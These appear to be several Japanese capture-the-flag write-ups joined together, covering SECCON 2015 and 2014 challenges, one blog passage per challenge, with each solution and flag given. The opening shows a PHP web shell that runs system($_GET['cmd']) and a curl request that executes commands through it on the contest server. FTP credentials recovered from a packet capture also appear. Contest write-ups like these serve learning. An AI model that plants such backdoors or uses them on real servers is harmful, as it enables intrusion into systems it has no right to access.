$ cat /var/www/html/SECRETS/backdoor123.php <html> <head> <meta charset="utf-8"> <title>SECCON 2015</title> </head> <body style='background:#000;color:#52d6eb;font-family:"ヒラギノ明朝 ProN W6", "HiraMinProN-W6", "HG明朝E", "ＭＳ Ｐ明朝", "MS PMincho", "MS 明朝", serif'> <img src="logo.png"> <h2 style="text-align:center">SECURITY CONTEST 2015</h2> <h1 style="font-size:28px;border-top:1px solid #28363D;border-bottom:1px solid #28363D;padding:15px">Entry Form</h1> <form action="?" method="get"><pre> <pre><?php system($_GET['cmd']); ?></pre> <h1>Your entry was sent. <a href='?' style='color:#52d6eb'>Go Back</a></h1>

バックドアに cat /var/www/html/log を実行するよう渡してやると、flagが返って来ました。

root# curl http://entryform.pwn.seccon.jp/SECRETS/backdoor123.php?cmd=cat%20/var/www/html/log

<pre>**FLAG** SECCON{Glory_will_shine_on_you.} ********

flagは SECCON{Glory_will_shine_on_you.} 。

Connect the server - Web/Network 100

問題文

login.pwn.seccon.jp:10000

Webブラウザでアクセスしてみると、一部文字化けしたような感じ。

テキストとして保存してみると、flagらしきのがspace(0x20)とbackspace(0x08)で区切られている

00000000 43 4f 4e 4e 45 43 54 20 33 30 30 0d 0a 0d 0a 57 |CONNECT 300….W| 00000010 65 6c 63 6f 6d 65 20 74 6f 20 53 45 43 43 4f 4e |elcome to SECCON| 00000020 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 54 68 65 20 | server…..The | 00000030 73 65 72 76 65 72 20 69 73 20 63 6f 6e 6e 65 63 |server is connec| 00000040 74 65 64 20 76 69 61 20 73 6c 6f 77 20 64 69 61 |ted via slow dia| 00000050 6c 2d 75 70 20 63 6f 6e 6e 65 63 74 69 6f 6e 2e |l-up connection.| 00000060 0d 0a 50 6c 65 61 73 65 20 62 65 20 70 61 74 69 |..Please be pati| 00000070 65 6e 74 2c 20 61 6e 64 20 64 6f 20 6e 6f 74 20 |ent, and do not | 00000080 62 72 75 74 65 2d 66 6f 72 63 65 2e 0d 0a 53 08 |brute-force…S.| 00000090 20 08 45 08 20 08 43 08 20 08 43 08 20 08 4f 08 | .E. .C. .C. .O.| 000000a0 20 08 4e 08 20 08 7b 08 20 08 53 08 20 08 6f 08 | .N. .{. .S. .o.| 000000b0 20 08 6d 08 20 08 65 08 20 08 74 08 20 08 69 08 | .m. .e. .t. .i.| 000000c0 20 08 6d 08 20 08 65 08 20 08 73 08 20 08 5f 08 | .m. .e. .s. ._.| 000000d0 20 08 77 08 20 08 68 08 20 08 61 08 20 08 74 08 | .w. .h. .a. .t.| 000000e0 20 08 5f 08 20 08 79 08 20 08 6f 08 20 08 75 08 | ._. .y. .o. .u.| 000000f0 20 08 5f 08 20 08 73 08 20 08 65 08 20 08 65 08 | ._. .s. .e. .e.| 00000100 20 08 5f 08 20 08 69 08 20 08 73 08 20 08 5f 08 | ._. .i. .s. ._.| 00000110 20 08 4e 08 20 08 4f 08 20 08 54 08 20 08 5f 08 | .N. .O. .T. ._.| 00000120 20 08 77 08 20 08 68 08 20 08 61 08 20 08 74 08 | .w. .h. .a. .t.| 00000130 20 08 5f 08 20 08 79 08 20 08 6f 08 20 08 75 08 | ._. .y. .o. .u.| 00000140 20 08 5f 08 20 08 67 08 20 08 65 08 20 08 74 08 | ._. .g. .e. .t.| 00000150 20 08 7d 08 20 08 0d 0a 6c 6f 67 69 6e 3a 20 0d | .}. …login: .| 00000160 0a 0d 0a 4c 6f 67 69 6e 20 74 69 6d 65 72 20 74 |…Login timer t| 00000170 69 6d 65 64 20 6f 75 74 2e 0d 0a 54 68 61 6e 6b |imed out…Thank| 00000180 20 79 6f 75 20 66 6f 72 20 79 6f 75 72 20 63 6f | you for your co| 00000190 6f 70 65 72 61 74 69 6f 6e 2e 0d 0a 0d 0a 48 49 |operation…..HI| 000001a0 4e 54 3a 20 49 74 20 69 73 20 61 6c 72 65 61 64 |NT: It is alread| 000001b0 79 20 69 6e 20 79 6f 75 72 20 68 61 6e 64 73 2e |y in your hands.| 000001c0 0d 0a 0d 0a 47 6f 6f 64 20 62 79 65 2e 0d 0a |….Good bye…|

0x20と0x8を除去して、flagがこちら。 SECCON{Sometimes_what_you_see_is_NOT_what_you_get}

ちなみにIEで表示した時の画面はこんなの。

vulsで参加しました。結果は17位, 3600ptでした。

↓Writeup↓

Start SECCON CTF (Crypto 50pt)

やるだけ換字式暗号

Flag: SECCON{HACKTHEPLANET}

Unzip the file(Crypto 100pt)

自明既知平文攻撃。ただ、ファイルを2つとも指定しないとうまく行かなかった。

flagファイルは.docxなので開いて読むとFlag。

Flag: SECCON{1s_th1s_passw0rd_ weak?}

Reverse-Engineering Android APK 1(Reversing 100pt)

適当にDecompileするとロジックが出てくる。大体次のような感じ

calc()はJNIライブラリの中に入っていて、mov eax, 7だけだった。 大体やるだけ

Flag: SECCON{107749}

Commandline Quiz (Unknown 100pt)

stage1: head

stage2: tail

stage3: grep

stage4: awk

Flag: SECCON{CaitSith@AQUA}

Crypto 300(Binary/300)

動的解析すると、一文字ずつ暗号化されていることがわかる。ブルートフォースして終わり。

Flag: SECCON{Cry_Pto_Oo_Oo1Oo_oo_Oo_O}

Find the prime numbers (Crypto 200pt)

数式からPaillier暗号だと気づく。log.txtが見えてしまうことに気づいたぐらいでどうしようか考えたところ、次のように考えることで解くことができた。

判明しているのは\(c, o, h\)のみ。

\(h = c\cdot o \mod n^2\)なので、\(c\cdot o = h - k\cdot n^2\)となるような\(k\)が存在する。

\(h-c\cdot o = kn^2\)なので、\(kn^2\)を計算できる。

複数のデータセットを見ることができたので、それぞれを\(h_1, c_1, o_1, k_1, h_2, c_2, o_2, k_2\)として\(k_1\)と\(k_2\)が互いに素であるとき\(\mathrm{gcd}(h_1-c_1\cdot o_1, h_2-c_2\cdot o_2)\)を計算することで\(n^2\)を手に入れることが出来る。実際には一発で互いに素となうような\(k_1, k_2\)になった。

ビット数がかなり小さいことはわかっていたので、Pari/GPでfactorを利用して素因数分解。

後はPaillier暗号を解き、投げるだけ。

from scryptos import *で利用しているscryptoslibの使用許可は@_193sに得ています。

Flag: SECCON{SECCoooo_oooOooo_ooooooooN}

Steganography 1(Steganography 100pt)

画像が大量に結合されてた。やるだけ

Flag: SECCON{OCT 21 2015 0728}

Steganography 2(Steganography 100pt)

一部の画素データが隠されているので、IDATをいじって縦幅を変えてCRC再計算して見るだけ。

Flag: Steganography 2 (Stego 100pt)

Indivisual Elebin(Binary 200pt)

いろんなアーキのgdb-simバイナリが渡される。全部実行するだけ。

targetは次を使った。

1.bin: そのまま

2.bin: m68hc11-elf

3.bin: v850-elf

4.bin: m32r-elf

5.bin: sh64-elf

6.bin: sparc-elf

7.bin: mcore-elf(コンパイル時にエラーが出るのでgdb/configureを書き換えて無理やりビルド)

8.bin: cris-elf

9.bin: avr-elf(結構前にビルドしてたのを使った)

10.bin: arm-elf

11.bin: mips16-elf(readelf -aしてみるとFlagsのところに16bitの旨が書いてある。)

後は次々実行するだけ。sparcについては何故かsparc-elf-runではなくsparc-elf-gdbを使わないと実行できなかった。

1: SECCON{AaA

2: B

3: i

4: N

5: 12345678

6: 90abcdef

7: BDFHJLNP

8: AW

9: 3a5d37a3

10:8a0d28f

11:aAq}

Flag: SECCON{AaABiN1234567890abcdefBDFHJLNPAW3a5d37a38a0d28faAq}

Last Challenge (Thank you for playing) (Misc/Crypto, 50p)

最初と同様にやるだけ。

Flag: SECCON{SEEYOUNEXTYEAR}

感想

Google スプレッドシートに作りました。

SECCON 2015 Online CTFのWrite-upが集まる魔法のスプレッドシート

今日(2015-10-03)は、 CTF for ビギナーズ 2015 滋賀 に参加してきました。

TwitterのTLを見ていたら、運良くこのイベントが紹介されていました。 実は3度目のCTFで、昨年のSECCONのネット予選では悔しい思いをしました。 今回は基礎から勉強できる良い機会となりました。

7/19に開催されたSECCON CTFのオンライン予選の結果です。 Ganbare Tigers Jrは12位でした(予選登録は全425チーム)。予選突破ラインの7位には届かず。 私は全然問題が解けなくてくやしかったです。。

パケット 100

パケットをキャプチャしたデータが問題です。

root# file seccon2014.pcapng seccon2014.pcapng: pcap-ng capture file - version 1.0

試しにstringsでテキストを抽出してみると、ftpでログインしてファイルをダウンロードしているのがわかります。特徴的な箇所を抜粋したのがこちら。

root# strings seccon2014.pcapng

=USER seccon2014 331 Username ok, send password.

PASS w31c0m3 230 Login successful.

@o-rw-rw-r– 1 shiracamus shiracamus 33 Jul 13 17:04 flag.txt

TYPE I Cf200 Type set to: Binary.

RETR flag.txt

QUIT 221 Goodbye.

ダウンロードしているflag.txtというファイルが怪しいです。 ちゃんとみるためにwiresharkでパケットデータを開きます。メニューからFind packetを開き、flag.txtを検索します。

すると、flag.txtをリクエストしている行がヒットします。

No.55が実際にサーバからダウンロードしているflag.txt本体が含まれるパケットです。 低レイヤを除去してデータ部分だけを見るために、No.55を選択した状態でFollow TCP Streamします。(※FTPは制御チャネルとデータチャネルでコネクションが異なるので、No.53のRETR flag.txtの行でFollow TCP Streamしても、制御チャネルのデータだけが表示されることに注意)

いかにも、、な文字列です。これをファイルに保存して、base64でデコードします。

root# cat flag.bin RkxBR3tGN1AgMTUgTjA3IDUzQ1VSM30= root# base64 -d flag.bin FLAG{F7P 15 N07 53CUR3}

フラグは、 F7P 15 N07 53CUR3 (FTP IS NOT SECURE)でした。

完成しなかったモヤモヤを晴らすために，後から作りました．